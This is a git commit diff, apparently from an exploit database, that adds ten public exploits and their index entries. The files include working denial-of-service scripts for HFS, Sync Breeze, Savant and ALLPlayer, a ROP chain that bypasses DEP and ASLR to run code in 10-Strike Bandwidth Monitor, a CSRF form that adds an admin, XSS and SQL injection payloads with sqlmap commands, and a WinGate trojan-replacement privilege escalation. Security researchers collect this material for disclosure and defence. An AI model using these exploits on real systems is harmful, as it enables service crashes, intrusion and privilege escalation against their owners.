DB: 2020-06-11
10 changes to exploits/shellcodes Sync Breeze Enterprise 10.0.28 - Denial of-Service (PoC) Sync Breeze Enterprise 10.4.18 - Denial of-Service (PoC) Savant Web Server 3.1 - Denial of-Service (PoC) ALLPlayer 7.5 - Denial of-Service (PoC) 10-Strike Bandwidth Monitor 3.9 - Buffer Overflow (SEH_DEP_ASLR) WinGate 9.4.1.5998 - Insecure Folder Permissions HFS Http File Server 2.3m Build 300 - Buffer Overflow (PoC) Sistem Informasi Pengumuman Kelulusan Online 1.0 - Cross-Site Request Forgery (Add Admin) Joomla J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated) Virtual Airlines Manager 2.6.2 - 'id' SQL Injection
This commit is contained in:
parent
809b91dc6f
commit
6ec646f7e1
11 changed files with 602 additions and 0 deletions
192
exploits/multiple/remote/48569.py
Executable file
192
exploits/multiple/remote/48569.py
Executable file
|
@ -0,0 +1,192 @@
|
|||
# Exploit Title: HFS Http File Server 2.3m Build 300 - Buffer Overflow (PoC)
|
||||
# Date: 2020-06-05
|
||||
# Exploit Author: hyp3rlinx
|
||||
# Vendor Homepage: www.rejetto.com
|
||||
# CVE : CVE-2020-13432
|
||||
|
||||
[+] Credits: John Page (aka hyp3rlinx)
|
||||
[+] Website: hyp3rlinx.altervista.org
|
||||
[+] Source: http://hyp3rlinx.altervista.org/advisories/HFS-HTTP-FILE-SERVER-v2.3-REMOTE-BUFFER-OVERFLOW-DoS.txt
|
||||
[+] twitter.com/hyp3rlinx
|
||||
[+] ISR: ApparitionSec
|
||||
|
||||
|
||||
[Vendor]
|
||||
www.rejetto.com
|
||||
|
||||
|
||||
[Product]
|
||||
HFS Http File Server v2.3m Build 300
|
||||
|
||||
|
||||
[Vulnerability Type]
|
||||
Remote Buffer Overflow (DoS)
|
||||
|
||||
|
||||
[CVE Reference]
|
||||
CVE-2020-13432
|
||||
|
||||
|
||||
[Security Issue]
|
||||
rejetto HFS (aka HTTP File Server) v2.3m Build #300, when virtual
|
||||
files or folders are used, allows remote attackers to trigger an
|
||||
invalid-pointer write access violation via concurrent HTTP requests
|
||||
with a long URI or long HTTP headers like Cookie, User-Agent etc.
|
||||
|
||||
Remote unauthenticated attackers can send concurrent HTTP requests
|
||||
using an incrementing or specific payload range of junk characters for
|
||||
values in the URL parameters or HTTP headers sent to the server. This
|
||||
results in hfs.exe server crash from an invalid pointer write access
|
||||
violation.
|
||||
|
||||
Requirements:
|
||||
hfs.exe must have at least one saved virtual file or folder present.
|
||||
Test using a remote IP and NOT from the same machine (localhost).
|
||||
|
||||
Dump...
|
||||
|
||||
(e4c.3a8): Access violation - code c0000005 (first/second chance not available)
|
||||
For analysis of this file, run !analyze -v
|
||||
WARNING: Stack overflow detected. The unwound frames are extracted from outside normal stack bounds.
|
||||
eax=000a1390 ebx=000a138c ecx=006eb188 edx=001b0000 esi=00000000 edi=00000002
|
||||
eip=777ef8b4 esp=000a0e0c ebp=000a12cc iopl=0 nv up ei pl nz na pe nc
|
||||
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206
|
||||
ntdll!RtlpResolveAssemblyStorageMapEntry+0x18:
|
||||
777ef8b4 53 push ebx
|
||||
0:000> !load winext/msec
|
||||
0:000> !exploitable
|
||||
WARNING: Stack overflow detected. The unwound frames are extracted from outside normal stack bounds.
|
||||
*** WARNING: Unable to verify checksum for hfs.exe
|
||||
Exploitability Classification: EXPLOITABLE
|
||||
Recommended Bug Title: Exploitable - User Mode Write AV starting at ntdll!RtlpResolveAssemblyStorageMapEntry+0x0000000000000018 (Hash=0x7a29717c.0x325e6a71)
|
||||
|
||||
PROCESS_NAME: hfs.exe
|
||||
|
||||
FOLLOWUP_IP:
|
||||
hfs+8fad7
|
||||
0048fad7 8945f0 mov dword ptr [ebp-10h],eax
|
||||
|
||||
WRITE_ADDRESS: 000a0e08
|
||||
|
||||
|
||||
[References]
|
||||
https://github.com/rejetto/hfs2/releases/tag/v2.4-rc01
|
||||
|
||||
|
||||
[Exploit/POC]
|
||||
from socket import *
|
||||
import time,sys
|
||||
|
||||
#HFS HTTP File Server v2.3m build 300.
|
||||
#Vendor: www.rejetto.com
|
||||
#Remote Remote Buffer Overflow DoS
|
||||
#Note: hfs.exe must have at least one saved virtual file or folder on the target
|
||||
#test using a remote IP and not from the same machine.
|
||||
#Discovery: hyp3rlinx
|
||||
#hyp3rlinx.altervista.org
|
||||
#ISR: ApparitionSec
|
||||
#=========================================================================
|
||||
res=""
|
||||
once=0
|
||||
cnt=0
|
||||
max_requests=1666
|
||||
|
||||
def hfs_dos():
|
||||
|
||||
global ip,port,length,res,once,cnt,max_requests
|
||||
|
||||
cnt+=1
|
||||
|
||||
length += 1
|
||||
payload = "A"*length
|
||||
|
||||
try:
|
||||
s=socket(AF_INET, SOCK_STREAM)
|
||||
s.settimeout(2)
|
||||
s.connect((ip,port))
|
||||
##bof ="HEAD / HTTP/1.1\r\nHost: "+ip+"Cookie: "+payload+"\r\n\r\n"
|
||||
bof ="HEAD /?mode="+payload+" HTTP/1.1\r\nHost: "+ip+"\r\n\r\n"
|
||||
s.send(bof.encode("utf-8"))
|
||||
if once==0:
|
||||
once+=1
|
||||
res = s.recv(128)
|
||||
if res != "":
|
||||
print("Targets up please wait...")
|
||||
if "HFS 2.3m" not in str(res):
|
||||
print("[!] Non vulnerable HFS version, exiting :(")
|
||||
exit()
|
||||
except Exception as e:
|
||||
if e != None:
|
||||
if str(e).find("timed out")!=-1:
|
||||
if res=="":
|
||||
print("[!] Target is not up or behind a firewall? :(")
|
||||
exit()
|
||||
else:
|
||||
print("[!] Done!")
|
||||
exit()
|
||||
s.close()
|
||||
|
||||
if cnt == max_requests:
|
||||
return False
|
||||
return True
|
||||
|
||||
|
||||
def msg():
|
||||
print("HFS HTTP File Server v2.3m build 300.")
|
||||
print("Unauthenticated Remote Buffer Overflow (DoS - PoC)")
|
||||
print("Virtual HFS saved file or folder required.")
|
||||
print("Run from a different machine (IP) than the target.")
|
||||
print("By Hyp3rlinx - ApparitionSec\n")
|
||||
|
||||
if __name__=="__main__":
|
||||
|
||||
length=3
|
||||
|
||||
if len(sys.argv) != 3:
|
||||
msg()
|
||||
print("Usage: <hfs.exe Server>, <Port (usually 8080)>")
|
||||
exit()
|
||||
|
||||
ip = sys.argv[1]
|
||||
port = int(sys.argv[2])
|
||||
|
||||
msg()
|
||||
|
||||
while True:
|
||||
if not hfs_dos():
|
||||
print("[!] Failed, non vuln version or no virtual files exist :(")
|
||||
break
|
||||
|
||||
|
||||
|
||||
[POC Video URL]
|
||||
https://www.youtube.com/watch?v=qQ-EawfXuWY
|
||||
|
||||
|
||||
[Network Access]
|
||||
Remote
|
||||
|
||||
|
||||
[Severity]
|
||||
High
|
||||
|
||||
|
||||
[Disclosure Timeline]
|
||||
Vendor Notification: May 18, 2020
|
||||
Vendor reply: May 18, 2020
|
||||
Vendor confirm vulnerability: May 19, 2020
|
||||
Vendor creates fix: May 20, 2020
|
||||
Vendor released new version 2.4 : June 7, 2020
|
||||
June 8, 2020 : Public Disclosure
|
||||
|
||||
|
||||
|
||||
[+] Disclaimer
|
||||
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
|
||||
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
|
||||
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
|
||||
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
|
||||
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
|
||||
or exploits by the author or elsewhere. All content (c).
|
||||
|
||||
hyp3rlinx
|
40
exploits/php/webapps/48571.txt
Normal file
40
exploits/php/webapps/48571.txt
Normal file
|
@ -0,0 +1,40 @@
|
|||
# Exploit Title: Sistem Informasi Pengumuman Kelulusan Online 1.0 - Cross-Site Request Forgery (Add Admin)
|
||||
# Google Dork: N/A
|
||||
# Date: 2020-06-10
|
||||
# Exploit Author: Extinction
|
||||
# Vendor Homepage: https://adikiss.net/
|
||||
# Software Link: https://adikiss.net/2014/06/aplikasi-sistem-informasi-pengumuman-kelulusan-online-2/
|
||||
# Version: latest
|
||||
# Tested on: Linux,windows,macOS
|
||||
|
||||
# Description SpearSecurity :
|
||||
# CSRF vulnerability was discovered in Sistem kelulusan.
|
||||
# With this vulnerability, authorized users can be added to the system.
|
||||
|
||||
POC:
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<center>
|
||||
<hr>
|
||||
<form action="http://localhost.com/[path]admin/tambahuser.php" method="POST">
|
||||
<input type="text" class="form-control" name="nama"
|
||||
placeholder="Username" size="35">
|
||||
<br>
|
||||
<input type="text" class="form-control" name="username"
|
||||
placeholder="Spear" size="35">
|
||||
<br>
|
||||
<input type="text" class="form-control" name="pass"
|
||||
placeholder="Security" size="35">
|
||||
<br>
|
||||
<br>
|
||||
<input type="submit" name="submit" id="submit" value="Simpan Data"
|
||||
class="btn btn-primary" onclick="tb_remove()">
|
||||
</form>
|
||||
<hr>
|
||||
<h1> CODED BY SPEAR-SECURITY </h1>
|
||||
<h2> Author Extinction </h2>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
#SpearSecurity-ID
|
39
exploits/php/webapps/48572.txt
Normal file
39
exploits/php/webapps/48572.txt
Normal file
|
@ -0,0 +1,39 @@
|
|||
# Exploit Title: Joomla J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated)
|
||||
# Date: 2020-04-17
|
||||
# Exploit Author: Mehmet Kelepçe / Gais Cyber Security
|
||||
# Vendor Homepage: https://www.j2store.org/
|
||||
# Software Link: https://www.j2store.org/download.html
|
||||
# Reference: https://www.j2store.org/download-j2store/j2store-v3-3-3-13.html
|
||||
# Change Log: https://www.j2store.org/download-j2store/j2store-v3-3-3-13.html
|
||||
# Version: 3.3.11
|
||||
# Tested on: Kali Linux - Apache2
|
||||
--------------------------------------------------------------------------------
|
||||
Detail:
|
||||
--------------------------------------------------------------------------------
|
||||
File: administrator/components/com_j2store/models/products.php
|
||||
Vulnerable parameter: filter_order_Dir, filter_order
|
||||
|
||||
PoC:
|
||||
Request:
|
||||
--------------------------------------------------------------------------------
|
||||
POST /joomla/administrator/index.php HTTP/1.1
|
||||
Host: localhost
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://localhost/joomla/administrator/index.php?option=com_j2store&view=products
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 312
|
||||
Connection: close
|
||||
Cookie: [COOIKE]
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
option=com_j2store&view=products&task=browse&boxchecked=0&filter_order=[SQLi]&filter_order_Dir=[SQLi]&2d42ab72d5c2716881de5d802d08ca7f=1&search=1&product_type=0&limit=20&since=&until=&productid_from=&productid_to=&pricefrom=&priceto=&sku=&manufacturer_id=&vendor_id=&taxprofile_id=&visible=&limitstart=0
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
|
||||
|
||||
sqlmap -r sqli --dbs --risk=3 --level=5 --random-agent -p filter_order_Dir
|
||||
|
||||
--------------------------------------------------------------------------------
|
24
exploits/php/webapps/48574.txt
Normal file
24
exploits/php/webapps/48574.txt
Normal file
|
@ -0,0 +1,24 @@
|
|||
# Exploit Title: Virtual Airlines Manager 2.6.2 - 'id' SQL Injection
|
||||
# Date: 2020-06-09
|
||||
# Exploit Author: Mosaaed
|
||||
# Vendor Homepage: http://virtualairlinesmanager.net/
|
||||
# Dork: N/A
|
||||
# Affected Version: 2.6.2
|
||||
# Tested on: Ubuntu
|
||||
# CVE : N/A
|
||||
|
||||
-------------------
|
||||
xss
|
||||
|
||||
http://localhost/vam/index.php?page=plane_info_public®istry_id=“><<script>alert(document.cookie);//<</script>
|
||||
http://localhost/vam/index.php?page=fleet_public&plane_icao=1“><<script>alert(document.cookie);//<</script>
|
||||
http://localhost/vam/index.php?page=hub&hub_id=1“><<script>alert(document.cookie);//<</script>
|
||||
http://localhost/vam/index.php?page=fleet_public&plane_location=1“><<script>alert(document.cookie);//<</script>
|
||||
http://localhost/vam/index.php?page=event&event_id=1“><<script>alert(document.cookie);//<</script>
|
||||
-------------------------
|
||||
SQL Injection
|
||||
sqlmap -u "http://localhost/vam/index.php?page=manual_flight_details&ID=10" -p ID --dbs
|
||||
sqlmap -u "http://localhost/vam/index.php?page=plane_info_public®istry_id=10" -p registry_id --db
|
||||
sqlmap -u "http://localhost/vam/index.php?page=fleet_public&plane_icao=1" -p plane_icao --dbs
|
||||
sqlmap -u "http://localhost/vam/index.php?page=hub&hub_id=1" -p hub_id --dbs
|
||||
sqlmap -u "http://localhost/vam/index.php?page=fleet_public&plane_location=1" -p plane_location --dbs
|
26
exploits/windows/dos/38079.py
Executable file
26
exploits/windows/dos/38079.py
Executable file
|
@ -0,0 +1,26 @@
|
|||
#!/usr/bin/python
|
||||
import socket
|
||||
import sys
|
||||
from struct import pack
|
||||
|
||||
try:
|
||||
server = sys.argv[1]
|
||||
port = 80
|
||||
size = 260
|
||||
|
||||
httpMethod = b"GET /"
|
||||
inputBuffer = b"\x41" * size
|
||||
httpEndRequest = b"\r\n\r\n"
|
||||
|
||||
buf = httpMethod + inputBuffer + httpEndRequest
|
||||
|
||||
print("Sending evil buffer...")
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect((server, port))
|
||||
s.send(buf)
|
||||
s.close()
|
||||
|
||||
print("Done!")
|
||||
|
||||
except socket.error:
|
||||
print("Could not connect!")
|
8
exploits/windows/dos/43197.py
Executable file
8
exploits/windows/dos/43197.py
Executable file
|
@ -0,0 +1,8 @@
|
|||
#!/usr/bin/python
|
||||
|
||||
buffer = b"http://"
|
||||
buffer += b"\x41" * 1500
|
||||
|
||||
f=open("player.m3u","wb")
|
||||
f.write(buffer)
|
||||
f.close()
|
33
exploits/windows/dos/43200.py
Executable file
33
exploits/windows/dos/43200.py
Executable file
|
@ -0,0 +1,33 @@
|
|||
#!/usr/bin/python
|
||||
import socket
|
||||
import sys
|
||||
|
||||
try:
|
||||
server = sys.argv[1]
|
||||
port = 80
|
||||
size = 800
|
||||
inputBuffer = b"A" * size
|
||||
content = b"username=" + inputBuffer + b"&password=A"
|
||||
|
||||
buffer = b"POST /login HTTP/1.1\r\n"
|
||||
buffer += b"Host: " + server.encode() + b"\r\n"
|
||||
buffer += b"User-Agent: Mozilla/5.0 (X11; Linux_86_64; rv:52.0) Gecko/20100101 Firefox/52.0\r\n"
|
||||
buffer += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
|
||||
buffer += b"Accept-Language: en-US,en;q=0.5\r\n"
|
||||
buffer += b"Referer: http://10.11.0.22/login\r\n"
|
||||
buffer += b"Connection: close\r\n"
|
||||
buffer += b"Content-Type: application/x-www-form-urlencoded\r\n"
|
||||
buffer += b"Content-Length: "+ str(len(content)).encode() + b"\r\n"
|
||||
buffer += b"\r\n"
|
||||
buffer += content
|
||||
|
||||
print("Sending evil buffer...")
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect((server, port))
|
||||
s.send(buffer)
|
||||
s.close()
|
||||
|
||||
print("Done!")
|
||||
|
||||
except socket.error:
|
||||
print("Could not connect!")
|
31
exploits/windows/dos/44481.py
Executable file
31
exploits/windows/dos/44481.py
Executable file
|
@ -0,0 +1,31 @@
|
|||
#!/usr/bin/python
|
||||
import socket
|
||||
import sys
|
||||
from struct import pack
|
||||
|
||||
try:
|
||||
server = sys.argv[1]
|
||||
port = 9121
|
||||
size = 1000
|
||||
|
||||
inputBuffer = b"\x41" * size
|
||||
|
||||
header = b"\x75\x19\xba\xab"
|
||||
header += b"\x03\x00\x00\x00"
|
||||
header += b"\x00\x40\x00\x00"
|
||||
header += pack('<I', len(inputBuffer))
|
||||
header += pack('<I', len(inputBuffer))
|
||||
header += pack('<I', inputBuffer[-1])
|
||||
|
||||
buf = header + inputBuffer
|
||||
|
||||
print("Sending evil buffer...")
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect((server, port))
|
||||
s.send(buf)
|
||||
s.close()
|
||||
|
||||
print("Done!")
|
||||
|
||||
except socket.error:
|
||||
print("Could not connect!")
|
98
exploits/windows/local/48570.py
Executable file
98
exploits/windows/local/48570.py
Executable file
|
@ -0,0 +1,98 @@
|
|||
# Exploit Title: 10-Strike Bandwidth Monitor 3.9 - Buffer Overflow (SEH,DEP,ASLR)
|
||||
# Exploit Author: Bobby Cooke
|
||||
# Date: 2020-07-07
|
||||
# Vendor Site: https://www.10-strike.com/
|
||||
# Software Download: https://www.10-strike.com/bandwidth-monitor/bandwidth-monitor.exe
|
||||
# Tested On: Windows 10 - Pro 1909 (x86)
|
||||
# Version: version 3.9
|
||||
# Exploit Details:
|
||||
# 1. Bypass SafeSEH by overwriting the Structured Exception Handler (SEH) with a Stack-Pivot return address located in the [BandMonitor.exe] memory-space; as it was not compiled with the SafeSEH Protection.
|
||||
# 2. The Stack-Pivot will land in a RET Sled; as the process's offset on the Stack is different every time.
|
||||
# - StackPivot lands at a different offset, 1:660; 2:644; 3:676; 4:692; 5:696; 6:688; 7:692
|
||||
# 3. Bypass Address Space Layout Randomization (ASLR) & Data Execution Protection (DEP) using Return Orientation Programming (ROP), choosing Gadgets from the [ssleay32.dll], [BandMonitor.exe], and [LIBEAY32.dll]; as they are not compiled with Rebase or ASLR.
|
||||
# 4. A pointer to the LoadLibraryA symbol exists in the import table of the [LIBEAY32.dll] module. Use Gadgets to call LoadLibraryA and find the memory address of the [kernel.dll] module; as it is protected by ASLR and will be different every time the process runs.
|
||||
# 5. A pointer to the GetProcAddress symbol exists in the import table of the [LIBEAY32.dll] module. Use Gadgets to call GetProcAddress to find the memory address of the WinExec Symbol within [kernel32.dll].
|
||||
# 6. Use Gadgets to call the WinExec Function and open calc.
|
||||
# - Bad Characters: \x00 => \x20 ; \x0D & \x0A => Truncates buffer
|
||||
# Recreate:
|
||||
# Turn On DEP: This PC > Properties > Advanced System Settings > Advanced > Performance > Settings > Data Execution Prevention > "Turn on DEP for all programs and services except those I select:" > OK > Restart
|
||||
# Install > Run Exploit > Copy buffer from poc.txt > Start BandMonitor > Help > Enter Reg Key > Paste > Exploit
|
||||
# Base | Top | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Modulename
|
||||
# -------------------------------------------------------------------------------------------
|
||||
# 0x12000000 | 0x12057000 | False | True | False | False | False | [ssleay32.dll]
|
||||
# 0x00400000 | 0x01247000 | False | False | False | False | False | [BandMonitor.exe]
|
||||
# 0x11000000 | 0x11155000 | False | True | False | False | False | [LIBEAY32.dll]
|
||||
# -------------------------------------------------------------------------------------------
|
||||
|
||||
import struct
|
||||
OS_retSled = '\x41'*400
|
||||
retSled = '\x24\x01\x06\x11'*100 #11060124 # retn [LIBEAY32.dll] {PAGE_EXECUTE_READ}
|
||||
def createRopChain():
|
||||
ropGadgets = [
|
||||
# HMODULE LoadLibraryA( LPCSTR lpLibFileName);
|
||||
# $ ==> > 1106905D CALL to LoadLibraryA
|
||||
# $+4 > 012428B4 FileName = "kernel32.dll"
|
||||
0x012126f5, # POP EAX # RETN [BandMonitor.exe]
|
||||
0x110e70bc, # kernel32!loadlibrarya [LIBEAY32.dll]
|
||||
0x110495ef, # JMP [EAX] [LIBEAY32.dll]
|
||||
0x1106905d, # PUSH EAX # POP ESI # RETN [LIBEAY32.dll]
|
||||
0x012428B4, # &String = "kernel32.dll\x00"
|
||||
# EAX&ESI = &kernel32.dll
|
||||
# FARPROC GetProcAddress( HMODULE hModule, LPCSTR lpProcName);
|
||||
# $ ==> > 011D53D2 CALL to GetProcAddress
|
||||
# $+4 > 76C40000 hModule = (KERNEL32)
|
||||
# $+8 > 0014F6CC ProcNameOrOrdinal = "WinExec"
|
||||
0x01226010, # PUSH ESP # AND AL, 4 # POP ECX # POP EDX # RETN [BandMonitor.exe] - [move esp -> ecx]
|
||||
0xfffff2D4, # EDX = Offset2String; ECX = ESP
|
||||
0x011d53d2, # xchg eax, ecx # ret [BandMonitor.exe] - eax=esp & ecx = "kernel32.dll\x00"
|
||||
0x11061ea7, # sub eax, edx # ret [LIBEAY32.dll]- eax=&String="WinExec\d4"
|
||||
0x1106905d, # push eax # pop esi # ret [LIBEAY32.dll] - ESI&EAX="WinExec\d4"
|
||||
0x1107fc8a,0x1107fc8a,0x1107fc8a,0x1107fc8a,0x1107fc8a,0x1107fc8a,0x1107fc8a,
|
||||
# (INC EAX # RETN)*7 [LIBEAY32.dll]
|
||||
0x011f282b, # xor [eax], dl # ret [BandMonitor.exe] - ESI="WinExec\x00"
|
||||
0x01203a3b, # xchg eax, esi # ret [BandMonitor.exe] - EAX="WinExec\x00"
|
||||
0x11084dca, # xchg eax, edx # ret [LIBEAY32.dll] - EDX="WinExec\x00"
|
||||
0x012126f5, # POP EAX # RETN [BandMonitor.exe]
|
||||
0x110e708c, # kernel32!getprocaddress [LIBEAY32.dll]
|
||||
0x1109cdb9, # mov eax, ds:[eax] # ret [LIBEAY32.dll] - EAX = &GetProcAddress
|
||||
0x1106CE04, # mov [esp+8], edx # mov [esp+4], ecx # jmp near eax
|
||||
0x011d53d2, # xchg eax, ecx # ret [BandMonitor.exe] - ECX=&KERNEL32.WinExec
|
||||
0xffffffff, # NOP - Overwritten by GetProcAddress Stack Setup
|
||||
0xffffffff, # NOP - Overwritten by GetProcAddress Stack Setup
|
||||
# Call WinExec( CmdLine, ShowState );
|
||||
# CmdLine = "calc"
|
||||
# ShowState = 0x00000001 = SW_SHOWNORMAL - displays a window
|
||||
0x0106a762, # INC ESI # RETN [BandMonitor.exe] - ESI="calc\x"
|
||||
0x01203a3b, # xchg eax, esi # ret [BandMonitor.exe] - EAX="calc\xff"
|
||||
0x1106905d, # PUSH EAX # POP ESI # RETN [LIBEAY32.dll] - EAX&ESI="calc\xff"
|
||||
0x1107fc8a,0x1107fc8a,0x1107fc8a,0x1107fc8a, # (INC EAX # RETN)*4 [LIBEAY32.dll]
|
||||
0x01226014, # POP EDX # RETN [BandMonitor.exe]
|
||||
0xffffffff, # dl = 0xff
|
||||
0x011f282b, # xor [eax], dl # ret [BandMonitor.exe] - ESI="calc\x00"
|
||||
0x01218952, # NEG EDX # RETN [BandMonitor.exe] - EDX=0x01 = SW_SHOWNORMAL
|
||||
0x01203a3b, # xchg eax, esi # ret [BandMonitor.exe] - EAX="calc\x00"
|
||||
0x1102ce1f, # xchg eax, ecx [LIBEAY32.dll] - ECX="calc\x00" = CmdLine - EAX=&KERNEL32.WinExec
|
||||
0x1106CE04, # mov [esp+8], edx # mov [esp+4], ecx # jmp near eax
|
||||
0x11060124 # retn [LIBEAY32.dll] - ROP NOP
|
||||
]
|
||||
return ''.join(struct.pack('<I', _) for _ in ropGadgets)
|
||||
ropChain = createRopChain()
|
||||
OS_nSEH = '\x43'*(4188-len(OS_retSled+retSled+ropChain))
|
||||
nSEH = '\x44'*4
|
||||
# Stack pivot offset to controllable buffer: 1408 (0x580) bytes
|
||||
SEH = '\x70\x28\x21\x01' # 0x01212870 : {pivot 2064 / 0x810}
|
||||
WinExec = '\x57\x69\x6e\x45' # WinE
|
||||
WinExec += '\x78\x65\x63\xd4' # xec.
|
||||
calc = '\x63\x61\x6c\x63' # calc
|
||||
calc += '\xff\x42\x42\x42' # ....
|
||||
extra = '\x44'*2000
|
||||
buffer = OS_retSled + retSled + ropChain + OS_nSEH + nSEH + SEH + WinExec + calc + extra
|
||||
File = 'poc.txt'
|
||||
try:
|
||||
payload = buffer
|
||||
f = open(File, 'w')
|
||||
f.write(payload)
|
||||
f.close()
|
||||
print File + " created successfully"
|
||||
except:
|
||||
print File + ' failed to create'
|
101
exploits/windows/local/48573.txt
Normal file
101
exploits/windows/local/48573.txt
Normal file
|
@ -0,0 +1,101 @@
|
|||
# Exploit Title: WinGate 9.4.1.5998 - Insecure Folder Permissions
|
||||
# Date: 2020-06-05
|
||||
# Exploit Author: hyp3rlinx
|
||||
# Vendor Homepage: https://www.wingate.com
|
||||
# Version: 9.4.1.5998
|
||||
# CVE: CVE-2020-13866
|
||||
|
||||
|
||||
[+] Credits: John Page (aka hyp3rlinx)
|
||||
[+] Website: hyp3rlinx.altervista.org
|
||||
[+] Source: http://hyp3rlinx.altervista.org/advisories/WINGATE-INSECURE-PERMISSIONS-LOCAL-PRIVILEGE-ESCALATION.txt
|
||||
[+] twitter.com/hyp3rlinx
|
||||
[+] ISR: ApparitionSec
|
||||
|
||||
|
||||
[Vendor]
|
||||
wingate.com
|
||||
|
||||
|
||||
[Product]
|
||||
WinGate v9.4.1.5998
|
||||
|
||||
WinGate is a sophisticated integrated Internet gateway and communications server designed to meet the control,
|
||||
security and email needs of today's Internet-connected businesses.
|
||||
|
||||
|
||||
[Vulnerability Type]
|
||||
Insecure Permissions EoP
|
||||
|
||||
|
||||
[CVE Reference]
|
||||
CVE-2020-13866
|
||||
|
||||
|
||||
[Security Issue]
|
||||
WinGate has insecure permissions for the installation directory, which allows local
|
||||
users ability to gain privileges by replacing an executable file with a Trojan horse.
|
||||
The WinGate directory hands (F) full control to authenticated users, who can then run
|
||||
arbitrary code as SYSTEM after a WinGate restart or system reboot.
|
||||
|
||||
|
||||
C:\Program Files\WinGate>cacls WinGate.exe
|
||||
C:\Program Files\WinGate\WinGate.exe NT AUTHORITY\Authenticated Users:(ID)F
|
||||
NT AUTHORITY\SYSTEM:(ID)F
|
||||
BUILTIN\Administrators:(ID)F
|
||||
BUILTIN\Users:(ID)R
|
||||
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R
|
||||
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R
|
||||
|
||||
|
||||
[Affected Component]
|
||||
WinGate Installation Directory
|
||||
|
||||
[Impact Code execution]
|
||||
true
|
||||
|
||||
[Impact Denial of Service]
|
||||
true
|
||||
|
||||
[Impact Escalation of Privileges]
|
||||
true
|
||||
|
||||
[Impact Information Disclosure]
|
||||
true
|
||||
|
||||
|
||||
[Exploit/POC]
|
||||
Logon as standard user replace WinGate.exe with a trojan executable, wait for restart or reboot the system, your code runs as SYSTEM.
|
||||
|
||||
|
||||
[Network Access]
|
||||
Local
|
||||
|
||||
|
||||
[Severity]
|
||||
High
|
||||
|
||||
|
||||
[Disclosure Timeline]
|
||||
Vendor Notification: May 10, 2020
|
||||
Vendor acknowledgement: May 10, 2020
|
||||
Vulnerability confirmed: May 18, 2020
|
||||
Request status: May 22, 2020
|
||||
No reply
|
||||
Notify vendor request CVE: May 26, 2020
|
||||
No reply
|
||||
Advised of public disclosure: June 1, 2020
|
||||
No reply
|
||||
June 4, 2020 : Public Disclosure
|
||||
|
||||
|
||||
|
||||
[+] Disclaimer
|
||||
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
|
||||
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
|
||||
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
|
||||
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
|
||||
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
|
||||
or exploits by the author or elsewhere. All content (c).
|
||||
|
||||
hyp3rlinx
|
|
@ -6737,6 +6737,10 @@ id,file,description,date,author,type,platform,port
|
|||
48502,exploits/windows/dos/48502.py,"Konica Minolta FTP Utility 1.0 - 'NLST' Denial of Service (PoC)",2020-05-22,Socket_0x03,dos,windows,
|
||||
48503,exploits/windows/dos/48503.py,"Filetto 1.0 - 'FEAT' Denial of Service (PoC)",2020-05-22,Socket_0x03,dos,windows,
|
||||
48521,exploits/multiple/dos/48521.py,"BIND - 'TSIG' Denial of Service",2020-05-20,"Teppei Fukuda",dos,multiple,
|
||||
43200,exploits/windows/dos/43200.py,"Sync Breeze Enterprise 10.0.28 - Denial of-Service (PoC)",2017-09-27,"Mr Bruce",dos,windows,
|
||||
44481,exploits/windows/dos/44481.py,"Sync Breeze Enterprise 10.4.18 - Denial of-Service (PoC)",2018-04-01,"Mr Bruce",dos,windows,
|
||||
38079,exploits/windows/dos/38079.py,"Savant Web Server 3.1 - Denial of-Service (PoC)",2012-01-22,DDD004,dos,windows,
|
||||
43197,exploits/windows/dos/43197.py,"ALLPlayer 7.5 - Denial of-Service (PoC)",2017-11-27,"Kiefer Bauer",dos,windows,
|
||||
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
||||
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
||||
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
||||
|
@ -11087,6 +11091,8 @@ id,file,description,date,author,type,platform,port
|
|||
48543,exploits/windows/local/48543.txt,"IObit Uninstaller 9.5.0.15 - 'IObit Uninstaller Service' Unquoted Service Path",2020-06-04,Gobinathan,local,windows,
|
||||
48563,exploits/windows/local/48563.py,"Frigate 3.36.0.9 - 'Command Line' Local Buffer Overflow (SEH) (PoC)",2020-06-08,"Paras Bhatia",local,windows,
|
||||
